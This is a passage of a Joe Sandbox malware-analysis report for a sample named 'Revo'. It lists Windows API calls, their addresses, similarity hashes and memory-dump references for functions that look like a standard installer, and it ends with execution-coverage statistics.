                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                              • String ID: $M$N
                                                                                                                                              • API String ID: 2564846305-813528018
                                                                                                                                              • Opcode ID: 34fa74ef7f2c8ae10774f757d898aea139b191b20b2690d18c4730151a5bece5
                                                                                                                                              • Instruction ID: 154044203e87ae86578454b6b14b757097bfc819611b9ce4677548c75e4aac0f
                                                                                                                                              • Opcode Fuzzy Hash: 34fa74ef7f2c8ae10774f757d898aea139b191b20b2690d18c4730151a5bece5
                                                                                                                                              • Instruction Fuzzy Hash: D8028D70900609AFDB20DFA5CD85AAF7BB5FB45314F10857AF910BA2E1D7B98A41CF18
                                                                                                                                              APIs
                                                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040487E
                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404892
                                                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004048AF
                                                                                                                                              • GetSysColor.USER32(?), ref: 004048C0
                                                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048CE
                                                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048DC
                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 004048E1
                                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048EE
                                                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404903
                                                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040495C
                                                                                                                                              • SendMessageW.USER32(00000000), ref: 00404963
                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040498E
                                                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049D1
                                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004049DF
                                                                                                                                              • SetCursor.USER32(00000000), ref: 004049E2
                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004049FB
                                                                                                                                              • SetCursor.USER32(00000000), ref: 004049FE
                                                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404A2D
                                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A3F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                              • String ID: N$Remove folder: $WG@
                                                                                                                                              • API String ID: 3103080414-2486083310
                                                                                                                                              • Opcode ID: b01416c62338905acfc632b3e745d4ba8895ca3ce3da3a804f9e2edfaf49b693
                                                                                                                                              • Instruction ID: 519c373e7f185e7fda66e670232f02753279bd673d39c82729c50cf19e81ba39
                                                                                                                                              • Opcode Fuzzy Hash: b01416c62338905acfc632b3e745d4ba8895ca3ce3da3a804f9e2edfaf49b693
                                                                                                                                              • Instruction Fuzzy Hash: 6461B3B1A40209BFDF10AF60CD85A6A7B79FB84304F00843AFA15B62D0D779A951CF99
                                                                                                                                              APIs
                                                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                              • DrawTextW.USER32(00000000,00464260,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                              • String ID: F
                                                                                                                                              • API String ID: 941294808-1304234792
                                                                                                                                              • Opcode ID: fed5d4dc3d325cae90a53ae0d2fcb83d70f3ae94d69320437858ee33f07fdf71
                                                                                                                                              • Instruction ID: dda4e0b8355a10cf3a4659add9ec42a83d374e9472f600803517c33aed587cab
                                                                                                                                              • Opcode Fuzzy Hash: fed5d4dc3d325cae90a53ae0d2fcb83d70f3ae94d69320437858ee33f07fdf71
                                                                                                                                              • Instruction Fuzzy Hash: 96418A71804209AFCF058FA5DE459BFBBB9FF45314F00802EF991AA1A0C7749A55DFA4
                                                                                                                                              APIs
                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406483,?,?), ref: 00406323
                                                                                                                                              • GetShortPathNameW.KERNEL32(?,0045ADE8,00000400), ref: 0040632C
                                                                                                                                                • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
                                                                                                                                                • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
                                                                                                                                              • GetShortPathNameW.KERNEL32(?,0045B5E8,00000400), ref: 00406349
                                                                                                                                              • wsprintfA.USER32 ref: 00406367
                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0045B5E8,C0000000,00000004,0045B5E8,?,?,?,?,?), ref: 004063A2
                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004063B1
                                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063E9
                                                                                                                                              • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,0045A9E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040643F
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406450
                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406457
                                                                                                                                                • Part of subcall function 00406192: GetFileAttributesW.KERNEL32(00000003,00403138,004D9000,80000000,00000003), ref: 00406196
                                                                                                                                                • Part of subcall function 00406192: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                              • String ID: %ls=%ls$[Rename]
                                                                                                                                              • API String ID: 2171350718-461813615
                                                                                                                                              • Opcode ID: 4099efde17faabea8ca23ed937e5d9f442c3975f0fb2967c08604eca1be790f2
                                                                                                                                              • Instruction ID: 026d517b253a5d6ccbe57f845948a58d3e37c3b70aabf831ebb2f23b3e620644
                                                                                                                                              • Opcode Fuzzy Hash: 4099efde17faabea8ca23ed937e5d9f442c3975f0fb2967c08604eca1be790f2
                                                                                                                                              • Instruction Fuzzy Hash: 14312370600315BBD2207F659D49F6B3A6CDF41759F12403AFA02F62D3EA7C982986BD
                                                                                                                                              APIs
                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004046A5
                                                                                                                                              • GetSysColor.USER32(00000000), ref: 004046E3
                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 004046EF
                                                                                                                                              • SetBkMode.GDI32(?,?), ref: 004046FB
                                                                                                                                              • GetSysColor.USER32(?), ref: 0040470E
                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 0040471E
                                                                                                                                              • DeleteObject.GDI32(?), ref: 00404738
                                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404742
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                              • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                              • Instruction ID: dc9e33635e48260261a40037ac820fc698cd45b4c1bae75aa0874807b7806060
                                                                                                                                              • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                              • Instruction Fuzzy Hash: B321A7715007049BCB309F38DA48B5B7BF4AF82714B00893DE9A6B72E0D778E904CB58
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FF7
                                                                                                                                              • GetMessagePos.USER32 ref: 00404FFF
                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00405019
                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040502B
                                                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405051
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                              • String ID: f
                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                              • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                              • Instruction ID: 35c53ee3dfde216a4a17f9e8076a2c946c4c65f0c866826bb74e9a6ab3448864
                                                                                                                                              • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                              • Instruction Fuzzy Hash: F3015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B49A058BA4
                                                                                                                                              APIs
                                                                                                                                              • GetDC.USER32(?), ref: 00401E76
                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                                                                                                              • CreateFontIndirectW.GDI32(0041E5F8), ref: 00401EF8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                              • String ID: Tahoma
                                                                                                                                              • API String ID: 3808545654-3580928618
                                                                                                                                              • Opcode ID: e7f7f24e504178032ddcf332a7fccd4deaa03fd5eea84bddf963d4e06575246e
                                                                                                                                              • Instruction ID: 75d1d1a794b0a88cdf1cba10915d0c929158808af8533b27f0e618500a238d04
                                                                                                                                              • Opcode Fuzzy Hash: e7f7f24e504178032ddcf332a7fccd4deaa03fd5eea84bddf963d4e06575246e
                                                                                                                                              • Instruction Fuzzy Hash: 5C01D475900260FFEB005BB5AD0DBDD7FB0AB29300F50C83AF542B61E2CAB904448B2D
                                                                                                                                              APIs
                                                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,004BD000,76F93420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
                                                                                                                                              • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
                                                                                                                                              • CharNextW.USER32(?,004BD000,76F93420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
                                                                                                                                              • CharPrevW.USER32(?,?,76F93420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                              • String ID: *?|<>/":
                                                                                                                                              • API String ID: 589700163-165019052
                                                                                                                                              • Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                                                                                                              • Instruction ID: ee050b90af12f7da754e5e1a7cefda923f304df8a209a79dab08f9ec4fc7f4f9
                                                                                                                                              • Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                                                                                                              • Instruction Fuzzy Hash: 0311B695800612A5DB303B148D40AB7A2F8AF55794F52403FED9AB3AC1EB7C4C9286BD
                                                                                                                                              APIs
                                                                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseEnum$DeleteValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1354259210-0
                                                                                                                                              • Opcode ID: acaf4fc398a66893391ff6439948fdf9f5bbe1b70c5a8b97b274ab2e0b988985
                                                                                                                                              • Instruction ID: 5e325e4eb8c599eaadb2b1545cb8ec7488c9788084a271734582f96bfbf33a22
                                                                                                                                              • Opcode Fuzzy Hash: acaf4fc398a66893391ff6439948fdf9f5bbe1b70c5a8b97b274ab2e0b988985
                                                                                                                                              • Instruction Fuzzy Hash: FA213D7150010ABFEF129F90CE89EEF7B7DEB54388F110076B909B11E0D7759E54AA64
                                                                                                                                              APIs
                                                                                                                                              • IsWindowVisible.USER32(?), ref: 004056CA
                                                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 0040571B
                                                                                                                                                • Part of subcall function 0040466D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040467F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                              • Opcode ID: 40cceb3117afc414cce41506be3bec60ebea1126e7aded61cc02dde06f92d8ba
                                                                                                                                              • Instruction ID: 4a72d77d5ba7db911775b8fd6e8698557fa8fe3088d7b3c11d294ca78c68b4d0
                                                                                                                                              • Opcode Fuzzy Hash: 40cceb3117afc414cce41506be3bec60ebea1126e7aded61cc02dde06f92d8ba
                                                                                                                                              • Instruction Fuzzy Hash: 6801B131100708EFDB204F90DDC0A9B3665FB80750F504036F605761D1D77A8C91EE2D
                                                                                                                                              APIs
                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040611F
                                                                                                                                              • CharNextA.USER32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406130
                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                              • Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                                                                                                              • Instruction ID: 5f3436636367d0d5bc92f6b0e419d408aad35ecbe6557c54d873c5627a92c34c
                                                                                                                                              • Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                                                                                                              • Instruction Fuzzy Hash: E4F0BB35604414FFC702DFA5DD00D9EBBA8EF46350B2640B9F841FB211D674DE129B99

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:10.4%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:3.2%
                                                                                                                                              Total number of Nodes:1505
                                                                                                                                              Total number of Limit Nodes:46
